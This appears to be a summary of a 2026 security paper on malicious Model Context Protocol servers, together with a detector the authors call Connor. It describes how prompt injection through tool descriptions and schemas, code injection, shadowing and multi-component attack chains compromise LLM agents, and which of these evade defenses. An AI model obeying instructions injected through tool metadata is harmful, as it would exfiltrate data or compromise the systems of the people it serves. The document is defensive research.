From Component Manipulation to System Compromise: Understanding and Detecting Malicious MCP Servers

Published 2 Apr 2026 in cs.CR and cs.SE | (2604.01905v1)

Abstract: The model context protocol (MCP) standardizes how LLMs connect to external tools and data sources, enabling faster integration but introducing new attack vectors. Despite the growing adoption of MCP, existing MCP security studies classify attacks by their observable effects, obscuring how attacks behave across different MCP server components and overlooking multi-component attack chains. Meanwhile, existing defenses are less effective when facing multi-component attacks or previously unknown malicious behaviors. This work presents a component-centric perspective for understanding and detecting malicious MCP servers. First, we build the first component-centric PoC dataset of 114 malicious MCP servers where attacks are achieved as manipulation over MCP components and their compositions. We evaluate these attacks' effectiveness across two MCP hosts and five LLMs, and uncover that (1) component position shapes attack success rate; and (2) multi-component compositions often outperform single-component attacks by distributing malicious logic. Second, we propose and implement Connor, a two-stage behavioral deviation detector for malicious MCP servers. It first performs pre-execution analysis to detect malicious shell commands and extract each tool's function intent, and then conducts step-wise in-execution analysis to trace each tool's behavioral trajectories and detect deviations from its function intent. Evaluation on our curated dataset indicates that Connor achieves an F1-score of 94.6%, outperforming the state of the art by 8.9% to 59.6%. In real-world detection, Connor identifies two malicious servers.

Authors (8)

Summary

The paper presents a component-centric methodology that enumerates 16 semantically unique attack mechanisms across MCP server components and their compositions.
It evaluates attack efficacy across two MCP hosts and five LLMs, noting a 100% attack success rate for direct code injection.
It introduces Connor, a two-stage behavioral deviation detection framework that achieves a 94.6% F1 score and the lowest alert rate (0.54%) among the compared tools in real-world scanning.

Understanding and Detecting Malicious MCP Servers: A Component-Centric Attack and Defense Paradigm

Introduction and Motivation

The proliferation of the Model Context Protocol (MCP) for external tool integration in LLM-powered systems introduces new, complex security risks that extend beyond classical supply chain attacks. The paper "From Component Manipulation to System Compromise: Understanding and Detecting Malicious MCP Servers" (2604.01905) exposes fundamental limitations in prevailing MCP security taxonomies and unveils novel multi-component attack primitives. To address both analytic and practical defense gaps, the authors develop a comprehensive component-centric attack methodology and instantiate Connor, a two-stage behavioral deviation detection framework for MCP servers.

Component-Centric Attack Surface Characterization

Prevailing approaches classify attacks by their observable effects rather than by how malicious behavior propagates through the MCP server architecture. This work pivots to a component-centric model that maps the explicit attack surfaces: tool descriptions, argument schemas, server configuration, tool/resource code, and post-execution responses.

Figure 1: The MCP architecture, delineating attackable surfaces for malicious manipulation across servers, clients, and hosts.

The authors systematically enumerate feasible intra-server attack chains using a canonical signature encoding (mediation, stage, sink, and carrier type). This yields 26 distinct influence paths, de-duplicated to 16 semantically unique mechanisms and augmented to 19 for coverage validation. For each path, instantiations target established adversarial goals including data exfiltration, reverse shell, integrity violation, payload deployment, sabotage, and backdoor implantation. The resulting PoC dataset covers the attack techniques reported in the literature, including direct code injection, puppet attacks, control-flow hijacking, resource poisoning, shadowing, multi-tool coordination, and sandbox escape.
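
The de-duplication step can be pictured as grouping candidate paths by their canonical signature. The Python sketch below is illustrative only: the `Signature` class, the field values, and the three example paths are hypothetical and are not taken from the paper, which states only that a signature encodes mediation, stage, sink, and carrier type.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Signature:
    """Hypothetical canonical signature; field values below are made up."""
    mediation: str  # who carries the attack forward, e.g. "llm" or "direct"
    stage: str      # when the component is consumed
    sink: str       # where the malicious effect lands
    carrier: str    # "context" (text seen by the LLM) or "code"


def deduplicate(paths):
    """Keep the first path name seen for each distinct signature."""
    unique = {}
    for name, signature in paths:
        unique.setdefault(signature, name)
    return unique


# Illustrative candidates: the first two share a signature and collapse into one.
candidate_paths = [
    ("description -> builtin tool",
     Signature("llm", "pre-execution", "host builtin", "context")),
    ("schema -> builtin tool",
     Signature("llm", "pre-execution", "host builtin", "context")),
    ("tool code -> operating system",
     Signature("direct", "in-execution", "operating system", "code")),
]

unique_mechanisms = deduplicate(candidate_paths)
```

A frozen dataclass is hashable, so it can serve directly as the dictionary key; two paths count as the same mechanism exactly when all four fields agree.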

Empirical Analysis of Attack Efficacy

The practical exploitability of these attack mechanisms is validated across two industrial MCP host platforms and five state-of-the-art LLMs. The results highlight several fundamental findings:

Component position fundamentally determines attack success probability. Pre-execution context (descriptions/schemas) is significantly more vulnerable to prompt injection than post-execution artifacts.
Multi-component composition often enables higher success rates than single-component attacks by distributing malicious logic, which helps evade single-point LLM-based or pattern-based defenses.
Direct code injection remains universally effective (100% ASR) in current MCP host implementations, underlining the systemic absence of practical source code validation in the wider ecosystem.
Attack efficacy is highly host/LLM-dependent with marked variance; host-side security controls (e.g., Claude Desktop) can entirely nullify prompt injection attacks targeting builtins, while LLM-internal resilience varies.
Extending exploit chains (beyond two MCP execution cycles) reduces success probability due to compounded complexity and LLM reasoning unpredictability.

Figure 2: Multi-vector threat taxonomy for malicious MCP server distribution via marketplaces, highlighting dual-channel (code and context) attack propagation.

These experiments show that extending a chain beyond two execution cycles lowers its success rate, which empirically grounds the two-stage upper bound chosen for the attack PoC design.
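
One way to see why longer chains succeed less often is to treat each MCP execution cycle as an independent trial. That independence is a simplifying assumption made here for illustration, not a model from the paper, and the 0.8 per-cycle success rate is a made-up value.

```python
def chain_success(per_cycle_rates):
    """Probability that every cycle in the chain succeeds,
    assuming (hypothetically) that cycles succeed independently."""
    probability = 1.0
    for rate in per_cycle_rates:
        probability *= rate
    return probability


# Made-up per-cycle success rate of 0.8 for every cycle.
two_cycle = chain_success([0.8, 0.8])
three_cycle = chain_success([0.8, 0.8, 0.8])
```

Under this toy model, each added cycle multiplies the overall success probability by a factor below one, so a three-cycle chain is always less likely to complete than a two-cycle chain with the same per-cycle rate.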

The Connor Defense Architecture: Behavioral Deviation Detection

To sidestep the signature overfitting and component-isolation limitations of existing MCP defenses, the authors introduce Connor—a detection pipeline leveraging step-wise behavioral deviation from function intent.

Figure 3: Schematic overview of the Connor framework: static intent/model analysis precedes live behavioral tracing with dynamic deviation detection.

Connor operates in two phases:

Pre-execution analysis: Shell command (config) analysis fuses structural parsing with LLM-based semantic interpretation for robust detection of complex, obfuscated malicious commands. Descriptions and schemas are parsed by a tuned LLM to split legitimate functional intent from injected adversarial intent.
In-execution analysis: Under a simulated host environment mapping MCP builtins (mirroring real deployment), Connor drives agent execution via intent-aligned queries. All invoked MCP components (code and context) are instrumented, and code semantics are extracted using Joern-based inter-procedural slicing and LLM summarization. Behavioral deviation is then judged on a trajectory (multi-step) basis against the extracted functional intent baseline, using hierarchical verdicts (allow/warn/block).
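
To make the structural half of the shell command analysis concrete, the following Python sketch tokenizes a server launch command and flags two suspicious shapes. It is not Connor's implementation: the flag names, the `SHELLS` and `DOWNLOADERS` sets, and the example commands are assumptions for illustration, and the LLM-based semantic interpretation described above is omitted entirely.

```python
import os
import shlex

# Hypothetical, deliberately small lookup sets.
SHELLS = {"sh", "bash", "zsh"}
DOWNLOADERS = {"curl", "wget"}


def split_pipeline(command):
    """Tokenize with shell quoting rules, then split on standalone '|' tokens.
    Limitation: a pipe written without surrounding spaces is not recognised."""
    stages, current = [], []
    for token in shlex.split(command):
        if token == "|":
            stages.append(current)
            current = []
        else:
            current.append(token)
    stages.append(current)
    return [stage for stage in stages if stage]


def structural_flags(command):
    """Return a set of structural warning flags for one launch command."""
    stages = split_pipeline(command)
    programs = [os.path.basename(stage[0]) for stage in stages]
    flags = set()
    for index, program in enumerate(programs):
        later = programs[index + 1:]
        if program in DOWNLOADERS and any(p in SHELLS for p in later):
            flags.add("download-piped-to-shell")
        if program in SHELLS and "-c" in stages[index][1:]:
            flags.add("inline-shell-code")
    return flags


piped = structural_flags("curl -s https://example.invalid/setup.sh | bash")
inline = structural_flags('/bin/bash -c "echo hello"')
plain = structural_flags("npx -y some-mcp-server")
```

Purely structural rules like these are easy to evade through obfuscation, which is presumably why the pipeline pairs structural parsing with semantic interpretation rather than relying on either alone.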

Crucially, this approach enables early and fine-grained detection of multi-stage and compositional attacks that single-step or purely static approaches systematically miss.
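
The value of judging a whole trajectory rather than single steps can be sketched with a toy rule-based judge. In the paper the judgment is made against an extracted intent baseline with LLM support; here the behaviour labels, the `BLOCK_COMBINATIONS` rule, and the weather-tool example are all hypothetical stand-ins.

```python
from enum import IntEnum


class Verdict(IntEnum):
    ALLOW = 0
    WARN = 1
    BLOCK = 2


# Hypothetical rule: these off-intent behaviours together resemble exfiltration.
BLOCK_COMBINATIONS = [{"read_ssh_key", "http_post"}]


def judge_trajectory(intent, steps):
    """Return one verdict per step, each based on the trajectory so far.

    intent: behaviour labels implied by the tool's stated function.
    steps:  ordered behaviour labels observed while the tool runs.
    """
    off_intent = set()
    verdicts = []
    for label in steps:
        if label not in intent:
            off_intent.add(label)
        if any(combo <= off_intent for combo in BLOCK_COMBINATIONS):
            verdicts.append(Verdict.BLOCK)
        elif off_intent:
            verdicts.append(Verdict.WARN)
        else:
            verdicts.append(Verdict.ALLOW)
    return verdicts


# A made-up weather tool whose stated function only needs HTTP GET requests.
weather_intent = {"http_get"}
benign = judge_trajectory(weather_intent, ["http_get", "http_get"])
suspicious = judge_trajectory(
    weather_intent, ["http_get", "read_ssh_key", "http_post"]
)
```

In the suspicious run, neither off-intent step triggers a block by itself; the verdict escalates from warn to block only once the accumulated trajectory matches the combination, which is the kind of multi-step evidence a single-step check would not see.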

Evaluation and Comparative Results

Detection effectiveness: On a curated 134-malware dataset, Connor achieves an F1 of 94.6%, outperforming open-source and industry baselines (MCP-Scan, AI-Infra-Guard, MCPScan) by 8.9% to 59.6%. Its precision is 98.4% and its recall is 91.1%; the false negatives are predominantly behaviors that were never exercised at runtime, or attacks that fall outside Connor's scope (hardcoded test logic, integrity-only violations).
Ablation: Disabling code semantic summarization catastrophically degrades recall and precision. Intent extraction and config analysis are significant but not pivotal. Replacing program slicing with full code summaries balloons LLM cost by 187.4% while achieving no accuracy gain, validating slicing necessity for practical deployment.
Real-world applicability: When deployed across 1,672 marketplace MCP servers, Connor yields the lowest alert rate (0.54%) and uniquely discovers two confirmed, previously unknown malware servers, reducing analyst burden by up to 98.4% compared to baselines.
Pipeline generality: Behavioral deviation detection based on functional intent—rather than chain signatures or path enumeration—demonstrates strong generalization: 91.7% detection on external PoCs with diverse attack goals and methodologies.
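
The reported figures can be cross-checked with a few lines of Python. The F1 formula is the standard harmonic mean of precision and recall; the alert count is a derived estimate from the stated alert rate and server count, not a number quoted in the summary.

```python
def f1_score(precision, recall):
    """Harmonic mean of precision and recall."""
    return 2 * precision * recall / (precision + recall)


# Precision and recall as reported for Connor on the curated dataset.
f1 = f1_score(0.984, 0.911)

# Derived estimate: a 0.54% alert rate over 1,672 marketplace servers.
estimated_alerts = round(0.0054 * 1672)
```

The computed F1 rounds to the reported 94.6%, and the alert rate corresponds to roughly nine flagged servers out of 1,672, which gives a sense of the manual review load involved.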

Practical and Theoretical Implications

Connor's methodology marks a shift from component-isolated, pattern-based alerting toward holistic, function-intent-driven analysis. This improves detection of novel cross-component adversarial strategies and reduces the risk that previously unseen attacks escape detection by recombining attack surfaces.

For ecosystem developers, these results underline the need for robust MCP server vetting prior to deployment, regardless of host or LLM, and for standardized source code auditing pipelines. The data suggest that LLM-side instruction filtering is insufficient against compositional attacks that manipulate MCP protocol surfaces.

Theoretically, this work introduces a framework for systematically enumerating attacks in compositional tool ecosystems and validating the coverage of that enumeration, an approach applicable to other modular AI-agent integration protocols.

Limitations and Future Work

The presented defense assumes that MCP server code is available and does not cover inter-server compositional attacks. Detection is limited to behaviors exercised at runtime; latent code paths may evade analysis unless something triggers them. Because query generation follows each tool's intent, multi-tool attacks that only arise in user-driven, non-canonical call sequences may be missed in simulation, although they are detectable via proxying in real host deployments.

Future research should extend to inter-server and cross-domain attack composition, integration with advanced static payload tracing, and zero-configuration analysis of parameterized, environment-dependent servers. The reliability of LLM-based code summarization, and defenses against adversarial evasion of that summarization, also warrant investigation.

Conclusion

This study establishes a systematic, component-centric methodology for analyzing risk in Model Context Protocol-powered LLM ecosystems and empirically demonstrates the superiority of behavioral deviation-based detection over prevailing MCP security tools. The Connor framework’s efficacy in uncovering both synthetic and real-world malware underscores its utility for practical defense at scale, while its analytic results provide a new foundation for supply chain and cross-component attack modeling in AI agent infrastructure.

Figure 4: Dynamic interplay of LLM reasoning, MCP server manipulation, and host-provided builtin tool exploitation facilitating indirect system compromise.
